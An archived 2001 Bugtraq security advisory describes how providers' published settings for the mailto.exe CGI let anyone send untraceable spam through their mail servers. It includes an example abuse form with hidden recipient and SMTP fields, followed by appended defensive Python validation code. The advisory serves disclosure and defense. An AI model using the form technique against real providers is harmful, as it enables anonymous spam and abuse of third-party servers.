Bugtraq mailing list archives

SPAMMERS DELIGHT: as feeble as feeble can be


From: "http-equiv () excite com" <http-equiv () excite com>
Date: Mon, 10 Dec 2001 15:40:25 -0800 (PST)

Monday, December 10, 2001

Forget about open relays. There is an extremely simple mailto form
application called mailto.exe available on the internet. Simply create your
html form, upload the mailto.exe into your cgi bin and fire away.

The problem is, as a courtesy, many ISPs, hosting companies, or providers
of other web site 'things' give their clients, in painful detail,
instructions on how to install and use this mailto.exe application.

The BIG problem is that these instructions include the provider's settings,
including their SMTP server name and the full path to the directory
containing mailto.exe, and it actually works!

For example:

<FORM ACTION="HTTP://WWW.MALWARE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST">
<INPUT TYPE="hidden" NAME="sendto" VALUE="billg () bloatedcorp com">
<INPUT TYPE="hidden" NAME="email" VALUE="hotsuezzz () xxxxxxrated com">
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.malware.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE="http://ww.malware.com">

Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments: <TEXTAREA NAME="comments" ROWS=10 COLS=50></TEXTAREA>

Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is Fake">
</FORM>

This can be input from any desktop HTML editor/viewer, and emails can be
fired away. Because it is located on the provider's site (within their
domain), the SMTP servers work and all IP addresses are theirs. In other
words, unlike a relay, which can reveal the originating IP address, this
provides for none of that.

Trivial searching with our favorite engine reveals two immediate, fully
functional providers' instructions, including all their details, which work
exactly as described. No doubt deep searching will yield many, many more.

Notes: there does not seem to be a single solution, other than to release
this and urge any and all providers, hosting services, and others to be aware
and to remove, or certainly not give out, their working server details.


---
http://www.malware.com
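The weakness in the form above is that the client chooses the recipient, the SMTP relay and the redirect target through hidden fields. As an added example (not part of the original post, and not mailto.exe's own code), here is a form-mail validator that keeps those decisions on the server: "sendto" is a key into a server-side recipient table, a client-supplied "server" field is rejected outright, addresses and subjects are checked for header injection, and "resulturl" must stay on the site. The domain names, recipient table and field names are constructed assumptions.

```python
import re
from email.message import EmailMessage

# Constructed, hypothetical server-side configuration: the relay and every
# permitted recipient live here, never in the HTML form.
SMTP_SERVER = "smtp.example.invalid"
RECIPIENTS = {"sales": "sales@example.invalid", "support": "support@example.invalid"}
SITE_ORIGIN = "https://www.example.invalid"
_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def validate(fields):
    """Return a rejection reason for submitted form fields, or None if acceptable."""
    # mailto.exe let the client pick the relay; here any attempt to do so is an error.
    if "server" in fields:
        return "client may not choose the SMTP server"
    # The recipient is a key into RECIPIENTS, so an arbitrary address cannot be targeted.
    if fields.get("sendto", "") not in RECIPIENTS:
        return "unknown recipient key"
    # fullmatch over a strict pattern also blocks CR/LF header injection in the address.
    if not _ADDR.fullmatch(fields.get("email", "")):
        return "invalid sender address"
    if any(c in fields.get("subject", "") for c in "\r\n"):
        return "header injection attempt in subject"
    # The post-submit redirect must stay on this site, not send the visitor elsewhere.
    result = fields.get("resulturl", SITE_ORIGIN + "/thanks")
    if not result.startswith(SITE_ORIGIN + "/"):
        return "redirect target must stay on this site"
    return None


def build_message(fields):
    """Build the outbound message for validated fields; raise ValueError otherwise."""
    reason = validate(fields)
    if reason:
        raise ValueError(reason)
    msg = EmailMessage()
    msg["From"] = "webform@example.invalid"      # fixed sender; the visitor's address is Reply-To only
    msg["Reply-To"] = fields["email"]
    msg["To"] = RECIPIENTS[fields["sendto"]]
    msg["Subject"] = fields.get("subject", "Web form submission")
    body = "\n".join(f"{k}: {fields.get(k, '')}" for k in ("uname", "title", "company", "comments"))
    msg.set_content(body)
    return msg   # hand to smtplib.SMTP(SMTP_SERVER).send_message(msg) in a real handler
```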
